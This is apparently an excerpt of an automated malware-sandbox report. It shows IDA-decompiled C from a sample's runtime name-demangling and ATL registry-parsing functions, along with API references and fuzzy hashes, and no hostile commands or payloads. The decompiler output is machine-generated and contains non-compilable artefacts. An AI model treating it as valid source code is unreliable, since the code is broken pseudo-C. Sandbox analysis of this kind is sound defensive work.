                      				E0095F3F0( &_v36);
                      				 *0xb3064d = 1;
                      				while(E0096AB70( &_v36) == 0) {
                      					_t60 =  *0xb30640; // 0x0
                      					if( *_t60 == 0) {
                      						break;
                      					}
                      					_t121 =  *0xb30640; // 0x0
                      					if( *_t121 == 0x40) {
                      						break;
                      					}
                      					_v7 = 0;
                      					if((_v6 & 0x000000ff) == 0) {
                      						_v7 = 1;
                      					} else {
                      						_v6 = 0;
                      					}
                      					_t122 =  *0xb30640; // 0x0
                      					_v16 =  *_t122 - 0x30;
                      					E0095F3F0( &_v28);
                      					_v8 = 0;
                      					if(_v16 < 0 || _v16 > 9) {
                      						_t97 =  *0xb30640; // 0x0
                      						_v20 = _t97;
                      						_t123 =  *0xb30640; // 0x0
                      						if( *_t123 != 0x24) {
                      							L21:
                      							_t66 =  *0xb30640; // 0x0
                      							if( *_t66 != 0x24) {
                      								L24:
                      								_t67 = E00968D00(_t90, _t138, _t139,  &_v68);
                      								_t140 = _t140 + 4;
                      								E0095F820( &_v28, _t67);
                      								L25:
                      								_t124 =  *0xb30640; // 0x0
                      								if(_t124 - _v20 > 1) {
                      									_t109 =  *0xb3063c; // 0x0
                      									if(E0096A590(_t109) == 0) {
                      										_t110 =  *0xb3063c; // 0x0
                      										L0095FF70(_t110,  &_v28);
                      									}
                      								}
                      								goto L28;
                      							}
                      							_t81 =  *0xb30640; // 0x0
                      							if( *((char*)(_t81 + (1 << 0))) == 0x24) {
                      								goto L24;
                      							}
                      							_t129 =  *0xb30640; // 0x0
                      							 *0xb30640 = _t129 + 1;
                      							_t83 = E009686C0(_t90, _t138, _t139,  &_v60);
                      							_t140 = _t140 + 4;
                      							E0095F820( &_v28, _t83);
                      							goto L25;
                      						}
                      						_t113 =  *0xb30640; // 0x0
                      						if( *((char*)(_t113 + 1)) != 0x24) {
                      							goto L21;
                      						}
                      						_v5 = 0;
                      						_t85 =  *0xb30640; // 0x0
                      						_v12 =  *((char*)(_t85 + 2));
                      						_v12 = _v12 - 0x24;
                      						if(_v12 > 0x36) {
                      							L19:
                      							if((_v5 & 0x000000ff) == 0) {
                      								goto L21;
                      							} else {
                      								continue;
                      							}
                      						}
                      						_t25 = _v12 + 0x9684bc; // 0xcccccc02
                      						switch( *((intOrPtr*)(( *_t25 & 0x000000ff) * 4 +  &M009684A8))) {
                      							case 0:
                      								__edx =  *0xb30640;
                      								__eax =  *((char*)(__edx + 3));
                      								if( *((char*)(__edx + 3)) == 0x56) {
                      									__ecx =  *0xb30640; // 0x0
                      									__ecx = __ecx + 4;
                      									 *0xb30640 = __ecx;
                      									_v5 = 1;
                      								}
                      								goto L19;
                      							case 1:
                      								 *0xb30640 =  *0xb30640 + 3;
                      								 *0xb30640 =  *0xb30640 + 3;
                      								goto L19;
                      							case 2:
                      								__ecx =  *0xb30640;
                      								__ecx =  *0xb30640 + 3;
                      								 *0xb30640 = __ecx;
                      								_v5 = 1;
                      								goto L19;
                      							case 3:
                      								_v8 = 1;
                      								_t135 =  *0xb30640; // 0x0
                      								 *0xb30640 = _t135 + 3;
                      								goto L19;
                      							case 4:
                      								goto L19;
                      						}
                      					} else {
                      						_t116 =  *0xb30640; // 0x0
                      						 *0xb30640 = _t116 + 1;
                      						_t118 =  *0xb3063c; // 0x0
                      						E0095F820( &_v28, E0095F9A0(_t118,  &_v52, _v16));
                      						L28:
                      						if(E0096A560( &_v28) != 0) {
                      							if(E0096A6C0( &_v28) != 0) {
                      								L36:
                      								continue;
                      							}
                      							E0095F350(_a4, 2);
                      							return _a4;
                      						}
                      						if((_v7 & 0x000000ff) != 0) {
                      							E0095FDE0( &_v36, 0x2c);
                      						}
                      						_t126 =  &_v28;
                      						E0095FD40( &_v36, _t126);
                      						if((_v8 & 0x000000ff) != 0) {
                      							_t75 = E00960060("...", 3);
                      							_t140 = _t140 + 8;
                      							_v44 = _t75;
                      							_v40 = _t126;
                      							E0095FCA0( &_v36,  &_v44);
                      						}
                      						goto L36;
                      					}
                      				}
                      				 *0xb3064d = 0;
                      				E0095F240(_a4,  &_v36);
                      				return _a4;
                      			}

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Mailbox$Iterator_baseIterator_base::_Name::isstd::_$EmptyFullNameName::Name::operator+=Replicator::isReplicator::operator+=Valid
                      • String ID: ...$6
                      • API String ID: 2413373717-4106199456
                      • Opcode ID: a68552bc105b0135818531e5104d032d5543ce7e00cbb7f00be6ac7eff09dbac
                      • Instruction ID: cafe41f3f586c5798aa29962bcd025a8a884bae9e5f34be6569581a2312fad93
                      • Opcode Fuzzy Hash: a68552bc105b0135818531e5104d032d5543ce7e00cbb7f00be6ac7eff09dbac
                      • Instruction Fuzzy Hash: 237128B0904155DFDB04EF94D8B2BBF7BB4BF81304F2882A9D40667265DF349945CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 96%
                      			E00964900(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, signed char _a8) {
                      				signed int _v5;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				intOrPtr _v44;
                      				intOrPtr _v48;
                      				intOrPtr _v52;
                      				intOrPtr _v56;
                      				intOrPtr _v60;
                      				intOrPtr _v64;
                      				char _v80;
                      				char _v88;
                      				char _v96;
                      				char _v104;
                      				char _v112;
                      				char _v120;
                      				char _v128;
                      				char _v136;
                      				char _v144;
                      				char _v152;
                      				char _v160;
                      				char _v168;
                      				char* _t70;
                      				char* _t71;
                      				intOrPtr* _t81;
                      				char* _t99;
                      				void* _t113;
                      				char* _t136;
                      				intOrPtr _t137;
                      				char* _t142;
                      				char* _t146;
                      				char* _t147;
                      				intOrPtr _t149;
                      				char _t157;
                      				intOrPtr _t160;
                      				intOrPtr _t163;
                      				void* _t165;
                      				void* _t166;
                      
                      				_t166 = __esi;
                      				_t165 = __edi;
                      				_t113 = __ebx;
                      				_v5 = 0;
                      				_t70 =  *0xb30640; // 0x0
                      				if( *_t70 == 0x51) {
                      					_v5 = 1;
                      					_t163 =  *0xb30640; // 0x0
                      					 *0xb30640 = _t163 + 1;
                      				}
                      				_t71 =  *0xb30640; // 0x0
                      				if( *_t71 != 0) {
                      					_t146 =  *0xb30640; // 0x0
                      					if( *_t146 < 0x30) {
                      						L10:
                      						E00969C90( &_v80);
                      						if((E0095FA10( &_v80) & 0x000000ff) == 0) {
                      							_t147 =  *0xb30640; // 0x0
                      							if( *_t147 != 0) {
                      								_v32 = E0095F350( &_v168, 2);
                      							} else {
                      								_v32 = E0095F350( &_v160, 1);
                      							}
                      							_v48 = _v32;
                      							E0095F240(_a4, _v48);
                      							return _a4;
                      						}
                      						_t149 =  *0xb30640; // 0x0
                      						 *0xb30640 = _t149 + 1;
                      						_t81 = E0095FA30( &_v80);
                      						_v16 =  *_t81;
                      						_v12 =  *((intOrPtr*)(_t81 + 4));
                      						if((_a8 & 0x000000ff) == 0) {
                      							if((_v5 & 0x000000ff) == 0) {
                      								_v28 = E0095F510(_t113,  &_v152, _t165, _t166, _v16, _v12);
                      							} else {
                      								_v28 = E0095FAA0( &_v144, 0xa06030, E0095F510(_t113,  &_v136, _t165, _t166, _v16, _v12));
                      							}
                      							_v44 = _v28;
                      							E0095F240(_a4, _v44);
                      							return _a4;
                      						}
                      						if((_v5 & 0x000000ff) == 0) {
                      							_v24 = E0095F420(_t113,  &_v128, _t165, _t166, _v16, _v12);
                      						} else {
                      							_v24 = E0095FAA0( &_v120, 0xa06030, E0095F420(_t113,  &_v112, _t165, _t166, _v16, _v12));
                      						}
                      						_v40 = _v24;
                      						E0095F240(_a4, _v40);
                      						return _a4;
                      					}
                      					_t136 =  *0xb30640; // 0x0
                      					_t157 =  *_t136;
                      					if(_t157 > 0x39) {
                      						goto L10;
                      					}
                      					if((_v5 & 0x000000ff) == 0) {
                      						_t99 =  *0xb30640; // 0x0
                      						asm("cdq");
                      						_v64 =  *_t99 - 0x2f;
                      						_v60 = _t157;
                      						_t137 =  *0xb30640; // 0x0
                      						 *0xb30640 = _t137 + 1;
                      						_v20 = E0095F510(_t113,  &_v104, _t165, _t166, _v64, _v60);
                      					} else {
                      						_t142 =  *0xb30640; // 0x0
                      						asm("cdq");
                      						_v56 =  *_t142 - 0x2f;
                      						_v52 = _t157;
                      						_t160 =  *0xb30640; // 0x0
                      						 *0xb30640 = _t160 + 1;
                      						_v20 = E0095FAA0( &_v96, 0xa06030, E0095F510(_t113,  &_v88, _t165, _t166, _v56, _v52));
                      					}
                      					_v36 = _v20;
                      					E0095F240(_a4, _v36);
                      					return _a4;
                      				} else {
                      					E0095F350(_a4, 1);
                      					return _a4;
                      				}
                      			}

                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 0096493E
                      • operator+.LIBVCRUNTIMED ref: 009649B3
                        • Part of subcall function 0095FAA0: DName::operator+.LIBCMTD ref: 0095FAC0
                      • DName::DName.LIBVCRUNTIMED ref: 009649A4
                        • Part of subcall function 0095F510: __aullrem.LIBCMT ref: 0095F557
                        • Part of subcall function 0095F510: __aulldiv.LIBCMT ref: 0095F570
                      • DName::DName.LIBVCRUNTIMED ref: 009649EC
                      • Mailbox.LIBCMTD ref: 00964A01
                      • DName::DName.LIBVCRUNTIMED ref: 00964A6A
                      • operator+.LIBVCRUNTIMED ref: 00964A79
                      • DName::DName.LIBVCRUNTIMED ref: 00964A91
                      • Mailbox.LIBCMTD ref: 00964AA6
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: NameName::$Mailboxoperator+$Name::operator+__aulldiv__aullrem
                      • String ID:
                      • API String ID: 2030757049-0
                      • Opcode ID: 0d0b220e0f8b09586a73f43e3fdcb49fc1c40617df8914d65be43f83bf70a7d6
                      • Instruction ID: 23784c7a18c2ea738adf2ac43f344d4722e62fce9109669ba9a382358b052909
                      • Opcode Fuzzy Hash: 0d0b220e0f8b09586a73f43e3fdcb49fc1c40617df8914d65be43f83bf70a7d6
                      • Instruction Fuzzy Hash: C27165B0D44118AFDB08DFE5D8A1AFEBBB5BF88301F108169F41AA7255DB30AA45CF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 90%
                      			E009486D0(void* __ebx, void* __ecx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24) {
                      				signed int _v8;
                      				char _v16;
                      				intOrPtr _v20;
                      				signed int _v24;
                      				signed int _v28;
                      				signed int _v44;
                      				signed int _v52;
                      				signed int _v56;
                      				signed int _v57;
                      				signed int _v64;
                      				char _v72;
                      				signed int _v84;
                      				signed int _v96;
                      				signed int _v104;
                      				intOrPtr _v108;
                      				signed int _v112;
                      				signed int _v116;
                      				char _v124;
                      				signed int _v136;
                      				signed int _v156;
                      				char _v168;
                      				signed int _v180;
                      				char _v192;
                      				signed int _v200;
                      				signed int _v201;
                      				signed int _v220;
                      				signed int _v240;
                      				signed int _v252;
                      				signed int _v264;
                      				signed int _v284;
                      				signed int _v289;
                      				signed int _v308;
                      				signed int _v328;
                      				signed int _v340;
                      				signed int _v352;
                      				signed int _v360;
                      				signed int _v364;
                      				char _v1396;
                      				signed int _v1404;
                      				CHAR* _v1408;
                      				CHAR* _v1412;
                      				signed int _v1428;
                      				signed int _v1433;
                      				signed int _v1452;
                      				signed int _v1472;
                      				signed int _v1484;
                      				signed int _v1496;
                      				signed int _v1508;
                      				char _v1520;
                      				signed int _v1540;
                      				signed int _v1545;
                      				void _v1564;
                      				signed int _v1584;
                      				void _v1596;
                      				signed int _v1608;
                      				signed int _v1620;
                      				char _v2656;
                      				signed int _v2668;
                      				signed int _v2676;
                      				signed int _v2680;
                      				signed int _v2696;
                      				signed int _v2704;
                      				signed int _v2708;
                      				signed int _v2712;
                      				signed int _v2716;
                      				intOrPtr _v2720;
                      				signed int _v2724;
                      				signed int _v2728;
                      				signed int _v2732;
                      				intOrPtr _v2736;
                      				intOrPtr _v2740;
                      				intOrPtr _v2744;
                      				char _v2752;
                      				char _v2760;
                      				intOrPtr _v2764;
                      				intOrPtr _v2768;
                      				intOrPtr _v2772;
                      				intOrPtr _v2776;
                      				char _v2784;
                      				char _v2792;
                      				intOrPtr _v2796;
                      				intOrPtr _v2800;
                      				intOrPtr _v2804;
                      				char _v2812;
                      				signed int _v2816;
                      				signed int _v2820;
                      				signed int _v2824;
                      				signed int _v2828;
                      				signed int _v2832;
                      				signed int _v2836;
                      				signed int _v2840;
                      				signed int _v2844;
                      				signed int _v2848;
                      				signed int _v2852;
                      				signed int _v2856;
                      				signed int _v2860;
                      				signed int _v2864;
                      				signed int _v2868;
                      				signed int _v2872;
                      				signed int _v2876;
                      				signed int _v2880;
                      				signed int _v2884;
                      				signed int _v2888;
                      				signed int _v2892;
                      				signed int _v2896;
                      				signed int _v2900;
                      				signed int _v2904;
                      				void _v2908;
                      				signed int _t754;
                      				signed int _t755;
                      				signed int _t769;
                      				void* _t775;
                      				signed int _t783;
                      				signed int _t805;
                      				signed int _t807;
                      				signed int _t817;
                      				void* _t818;
                      				intOrPtr _t820;
                      
                      				_push(0xffffffff);
                      				_push(0x9d4ec4);
                      				_push( *[fs:0x0]);
                      				memset( &_v2908, 0xcccccccc, 0x2d2 << 2);
                      				_t820 = _t818 - 0xb48 + 0xc;
                      				_pop(_t783);
                      				_t754 =  *0xa0600c; // 0x5d529087
                      				_t755 = _t754 ^ _t817;
                      				_v24 = _t755;
                      				_push(_t755);
                      				 *[fs:0x0] =  &_v16;
                      				_v20 = _t820;
                      				_v28 = _t783;
                      				E009441C0( &_v44, 0);
                      				_v8 = 0;
                      				_v52 = 0;
                      				_v56 = 0;
                      				_v57 = 0;
                      				_v64 = 0;
                      				_v104 = 0;
                      				_v108 = E00941AB0();
                      				_v112 = 0;
                      				_v116 = 0;
                      				E0094F2E0( &_v124);
                      				_v8 = 1;
                      				_t805 =  *( *_a8);
                      				E0094A0F0(_v28, _t805,  &_v72,  &_v84,  &_v96);
                      				while(_v72 != 6) {
                      					_v2820 = _v72;
                      					if(_v2820 > 0xb) {
                      						_t805 = 0;
                      						__eflags = 0;
                      						if(0 == 0) {
                      							_t775 = L00994930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x31a, 0, "%ls", 0x9f40dc);
                      							_t820 = _t820 + 0x18;
                      							__eflags = _t775 - 1;
                      							if(_t775 == 1) {
                      								asm("int3");
                      							}
                      						}
                      						L204:
                      						continue;
                      					}
                      					switch( *((intOrPtr*)(_v2820 * 4 +  &M0094A0BC))) {
                      						case 0:
                      							_v2704 = 0;
                      							_v8 = 0;
                      							E0094F220( &_v124);
                      							_v8 = 0xffffffff;
                      							E00944220( &_v44, _t824);
                      							_t769 = _v2704;
                      							goto L206;
                      						case 1:
                      							_v57 = 1;
                      							__eflags = _a24;
                      							if(__eflags == 0) {
                      								L8:
                      								__ecx = _a8;
                      								 *_a8 =  *_a8 + 4;
                      								__eax = _a8;
                      								 *_a8 =  *_a8 + 4;
                      								__ecx =  &_v96;
                      								__edx =  &_v84;
                      								__eax =  &_v72;
                      								__ecx = _a8;
                      								__edx =  *_a8;
                      								__eax =  *( *_a8);
                      								__ecx = _v28;
                      								__eax = E0094A0F0(__ecx,  *( *_a8),  &_v72,  &_v84,  &_v96);
                      								goto L204;
                      							}
                      							__edx = _a12;
                      							__eax = _v84;
                      							__ecx =  &_v44;
                      							__edx = _a4;
                      							__ecx = _v28;
                      							_v56 = E00948580(__ebx, _v28, __edi, __esi, __eflags, _a4,  &_v44, _v84, _a12);
                      							__eflags = _v56;
                      							if(_v56 >= 0) {
                      								goto L8;
                      							} else {
                      								__eax = _v56;
                      								_v2708 = _v56;
                      								_v8 = 0;
                      								__ecx =  &_v124;
                      								__eax = E0094F220( &_v124);
                      								_v8 = 0xffffffff;
                      								__ecx =  &_v44;
                      								E00944220(__ecx, __eflags) = _v2708;
                      								goto L206;
                      							}
                      						case 2:
                      							__eflags = _a24;
                      							if(__eflags == 0) {
                      								goto L12;
                      							}
                      							__ecx = _a12;
                      							__edx = _v84;
                      							__eax = _a4;
                      							__ecx = _v28;
                      							_v56 = E009483D0(__ebx, _v28, __edi, __esi, __eflags, _a4, _v84, _a12);
                      							__eflags = _v56;
                      							if(_v56 >= 0) {
                      								goto L12;
                      							}
                      							__ecx = _v56;
                      							_v2712 = _v56;
                      							_v8 = 0;
                      							__ecx =  &_v124;
                      							__eax = E0094F220( &_v124);
                      							_v8 = 0xffffffff;
                      							__ecx =  &_v44;
                      							E00944220(__ecx, __eflags) = _v2712;
                      							goto L206;
                      						case 3:
                      							L12:
                      							__eflags = _a24;
                      							if(__eflags != 0) {
                      								__eax = _a12;
                      								__ecx = _v84;
                      								__edx =  &_v44;
                      								__eax = _a4;
                      								__ecx = _v28;
                      								_v56 = E00948580(__ebx, _v28, __edi, __esi, __eflags, _a4,  &_v44, _v84, _a12);
                      								__eflags = _v56;
                      								if(_v56 >= 0) {
                      									L26:
                      									__edx = _a8;
                      									 *_a8 =  *_a8 + 4;
                      									__ecx = _a8;
                      									 *_a8 =  *_a8 + 4;
                      									__edx =  &_v96;
                      									__eax =  &_v84;
                      									__ecx =  &_v72;
                      									__edx = _a8;
                      									__eax =  *_a8;
                      									__ecx =  *( *_a8);
                      									__ecx = _v28;
                      									__eax = E0094A0F0(__ecx,  *( *_a8),  &_v72,  &_v84,  &_v96);
                      									goto L204;
                      								}
                      								__ecx = _v56;
                      								_v2724 = _v56;
                      								_v8 = 0;
                      								__ecx =  &_v124;
                      								__eax = E0094F220( &_v124);
                      								_v8 = 0xffffffff;
                      								__ecx =  &_v44;
                      								E00944220(__ecx, __eflags) = _v2724;
                      								goto L206;
                      							}
                      							_v136 = 0;
                      							__ecx =  &_v156;
                      							__eax = E0094E200( &_v156);
                      							__edx =  &_v136;
                      							__eax =  &_v156;
                      							__ecx = _v84;
                      							__edx = _a12;
                      							__ecx = _v28;
                      							_v56 = E00948100(__ebx, __ecx, _a12, __edi, __esi, _a12, _v84,  &_v156,  &_v136);
                      							__eflags = _v56;
                      							if(__eflags >= 0) {
                      								_v52 = 2;
                      								__eflags = _a4;
                      								if(_a4 != 0) {
                      									__eflags = _v136;
                      									if(_v136 == 0) {
                      										__edx = _v156;
                      										_v2824 = _v156;
                      									} else {
                      										__ecx = _v136;
                      										_v2824 = _v136;
                      									}
                      									__eax = _v2824;
                      									__ecx = _a4;
                      									__ecx =  &_v44;
                      									_v52 = E009445F0(__ecx, __esi, _a4, _v2824, 0x2001f);
                      								}
                      								__eflags = _v52;
                      								if(__eflags == 0) {
                      									L23:
                      									__eax = _a8;
                      									__ecx =  *_a8;
                      									__edx =  *( *_a8);
                      									_v64 =  *( *_a8);
                      									__ecx =  &_v156;
                      									__eax = L00951F30( &_v156, __eflags);
                      									goto L26;
                      								} else {
                      									__eflags = _v52 - 2;
                      									if(__eflags == 0) {
                      										goto L23;
                      									}
                      									__edx = _v52;
                      									_v2720 = E00942E00(__ecx, __eflags, _v52);
                      									__ecx =  &_v156;
                      									__eax = L00951F30( &_v156, __eflags);
                      									_v8 = 0;
                      									__ecx =  &_v124;
                      									__eax = E0094F220( &_v124);
                      									_v8 = 0xffffffff;
                      									__ecx =  &_v44;
                      									E00944220(__ecx, __eflags) = _v2720;
                      									goto L206;
                      								}
                      							}
                      							__eax = _v56;
                      							_v2716 = _v56;
                      							__ecx =  &_v156;
                      							__eax = L00951F30( &_v156, __eflags);
                      							_v8 = 0;
                      							__ecx =  &_v124;
                      							__eax = E0094F220( &_v124);
                      							_v8 = 0xffffffff;
                      							__ecx =  &_v44;
                      							E00944220(__ecx, __eflags) = _v2716;
                      							goto L206;
                      						case 4:
                      							__edx = 0;
                      							__eflags = 0;
                      							if(0 == 0) {
                      								__eax = L00994930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x211, 0, "%ls", 0x9f40dc);
                      								__eflags = __eax - 1;
                      								if(__eax == 1) {
                      									asm("int3");
                      								}
                      							}
                      							goto L204;
                      						case 5:
                      							__ecx = _a8;
                      							 *_a8 =  *_a8 + 4;
                      							__eax = _a8;
                      							 *_a8 =  *_a8 + 4;
                      							__ecx = _a24;
                      							__edx = _a20;
                      							__eax = _a16;
                      							__ecx = _a12;
                      							__edx = _a8;
                      							__eax = _v44;
                      							__ecx = _v28;
                      							_v56 = E009486D0(__ebx, _v28, __edi, __esi, _v44, _a8, _a12, _a16, _a20, _a24);
                      							__eflags = _v56;
                      							if(_v56 >= 0) {
                      								__edx =  &_v96;
                      								__eax =  &_v84;
                      								__ecx =  &_v72;
                      								__edx = _a8;
                      								__eax =  *_a8;
                      								__ecx =  *( *_a8);
                      								__ecx = _v28;
                      								__eax = E0094A0F0(__ecx,  *( *_a8),  &_v72,  &_v84,  &_v96);
                      								__eflags = _a24;
                      								if(_a24 != 0) {
                      									L39:
                      									goto L204;
                      								}
                      								__edx = _v57 & 0x000000ff;
                      								__eflags = _v57 & 0x000000ff;
                      								if((_v57 & 0x000000ff) != 0) {
                      									_v57 = 0;
                      									goto L39;
                      								}
                      								__eax =  &_v192;
                      								__ecx =  &_v180;
                      								__edx =  &_v168;
                      								__eax = _v64;
                      								__ecx = _v28;
                      								__eax = E0094A0F0(_v28, _v64,  &_v168,  &_v180,  &_v192);
                      								__ecx = _a12;
                      								__edx = _v180;
                      								__eax = _a4;
                      								__ecx = _v28;
                      								_v56 = E009483D0(__ebx, __ecx, __edi, __esi, __eflags, _a4, _v180, _a12);
                      								__eflags = _v56;
                      								if(_v56 >= 0) {
                      									goto L39;
                      								}
                      								__ecx = _v56;
                      								_v2732 = _v56;
                      								_v8 = 0;
                      								__ecx =  &_v124;
                      								__eax = E0094F220( &_v124);
                      								_v8 = 0xffffffff;
                      								__ecx =  &_v44;
                      								E00944220(__ecx, __eflags) = _v2732;
                      								goto L206;
                      							}
                      							__ecx = _v56;
                      							_v2728 = _v56;
                      							_v8 = 0;
                      							__ecx =  &_v124;
                      							__eax = E0094F220( &_v124);
                      							_v8 = 0xffffffff;
                      							__ecx =  &_v44;
                      							E00944220(__ecx, __eflags) = _v2728;
                      							goto L206;
                      						case 6:
                      							__edx = 0;
                      							__eflags = 0;
                      							if(0 == 0) {
                      								__eax = L00994930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x228, 0, 0x9f40e0, 0x9f40dc);
                      								__eflags = __eax - 1;
                      								if(__eax == 1) {
                      									asm("int3");
                      								}
                      							}
                      							_v2736 = 0x80004005;
                      							_v8 = 0;
                      							__ecx =  &_v124;
                      							__eax = E0094F220( &_v124);
                      							_v8 = 0xffffffff;
                      							__ecx =  &_v44;
                      							E00944220(__ecx, __eflags) = _v2736;
                      							goto L206;
                      						case 7:
                      							_v84 = _v84 | 0x80000000;
                      							_v200 = _v84 | 0x80000000;
                      							__edx = _a8;
                      							 *_a8 =  *_a8 + 4;
                      							__ecx = _a8;
                      							 *_a8 =  *_a8 + 4;
                      							__edx = _a24;
                      							__eax = _a20;
                      							__ecx = _a16;
                      							__edx = _a12;
                      							__eax = _a8;
                      							__ecx = _v200;
                      							__ecx = _v28;
                      							_v2740 = E009486D0(__ebx, _v28, __edi, __esi, _v200, _a8, _a12, _a16, _a20, _a24);
                      							_v8 = 0;
                      							__ecx =  &_v124;
                      							__eax = E0094F220( &_v124);
                      							_v8 = 0xffffffff;
                      							__ecx =  &_v44;
                      							E00944220(__ecx, __eflags) = _v2740;
                      							goto L206;
                      						case 8:
                      							__eflags = _a24;
                      							if(_a24 == 0) {
                      								L77:
                      								__edx = _a8;
                      								 *_a8 =  *_a8 + 4;
                      								__ecx = _a8;
                      								 *_a8 =  *_a8 + 4;
                      								__edx =  &_v96;
                      								__eax =  &_v84;
                      								__ecx =  &_v72;
                      								__edx = _a8;
                      								__eax =  *_a8;
                      								__ecx =  *( *_a8);
                      								__ecx = _v28;
                      								__eax = E0094A0F0(__ecx,  *( *_a8),  &_v72,  &_v84,  &_v96);
                      								goto L204;
                      							}
                      							_v201 = 0;
                      							__eflags = _v44;
                      							if(_v44 == 0) {
                      								__edx = _a4;
                      								_v44 = _a4;
                      								_v201 = 1;
                      							}
                      							__ecx =  &_v220;
                      							__eax = E0094E200( &_v220);
                      							_v8 = 2;
                      							__ecx =  &_v240;
                      							__eax = E0094E200( &_v240);
                      							_v8 = 3;
                      							_v252 = 0;
                      							_v264 = 0;
                      							__eax =  &_v252;
                      							__ecx =  &_v220;
                      							__edx = _v96;
                      							__eax = _a12;
                      							__ecx = _v28;
                      							_v56 = E00948100(__ebx, _v28, _v96, __edi, __esi, _a12, _v96,  &_v220,  &_v252);
                      							__eflags = _v56;
                      							if(_v56 >= 0) {
                      								__eflags = _v84;
                      								if(_v84 != 0) {
                      									__ecx =  &_v264;
                      									__edx =  &_v240;
                      									__eax = _v84;
                      									__ecx = _a12;
                      									__ecx = _v28;
                      									_v56 = E00948100(__ebx, _v28,  &_v240, __edi, __esi, _a12, _v84,  &_v240,  &_v264);
                      								}
                      							}
                      							__ecx =  &_v284;
                      							__eax = E009441C0( &_v284, 0);
                      							_v8 = 4;
                      							__eflags = _v84;
                      							if(_v84 != 0) {
                      								__eax = _a4;
                      								_v284 = _a4;
                      							} else {
                      								__edx = _v44;
                      								_v284 = _v44;
                      							}
                      							__eflags = _v252;
                      							if(_v252 == 0) {
                      								__edx = _v220;
                      								_v2828 = _v220;
                      							} else {
                      								__ecx = _v252;
                      								_v2828 = _v252;
                      							}
                      							__eflags = _v84;
                      							if(_v84 == 0) {
                      								_v2836 = 0;
                      							} else {
                      								__eflags = _v264;
                      								if(_v264 == 0) {
                      									__ecx = _v240;
                      									_v2832 = _v240;
                      								} else {
                      									__eax = _v264;
                      									_v2832 = _v264;
                      								}
                      								__edx = _v2832;
                      								_v2836 = _v2832;
                      							}
                      							__eax = _v2828;
                      							__ecx = _v2836;
                      							__ecx =  &_v284;
                      							_v52 = E00944840(__ecx, __esi, _v2836, _v2828, 1);
                      							_v284 = 0;
                      							__eflags = _v52;
                      							if(__eflags == 0) {
                      								__eax = _v201 & 0x000000ff;
                      								__eflags = _v201 & 0x000000ff;
                      								if((_v201 & 0x000000ff) != 0) {
                      									_v44 = 0;
                      								}
                      								__eflags = _v84;
                      								if(_v84 == 0) {
                      									_v2844 = "default";
                      								} else {
                      									__eflags = _v264;
                      									if(_v264 == 0) {
                      										__edx = _v240;
                      										_v2840 = _v240;
                      									} else {
                      										__ecx = _v264;
                      										_v2840 = _v264;
                      									}
                      									__eax = _v2840;
                      									_v2844 = _v2840;
                      								}
                      								__eflags = _v252;
                      								if(__eflags == 0) {
                      									__edx = _v220;
                      									_v2848 = _v220;
                      								} else {
                      									__ecx = _v252;
                      									_v2848 = _v252;
                      								}
                      								__eax = _v2844;
                      								_push(_v2844);
                      								__ecx = _v2848;
                      								__ecx = 0xb337ac;
                      								__eax = E0094F1F0(0xb337ac);
                      								__ecx =  &_v2752;
                      								E009423B0( &_v2752, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x24e) = E009423E0(__ebx, __edi, __esi, __eflags, __eax, __eax, 2, "Setting Value %Ts at %Ts\n", _v2848);
                      								_v8 = 3;
                      								__ecx =  &_v284;
                      								__eax = E00944220( &_v284, __eflags);
                      								_v8 = 2;
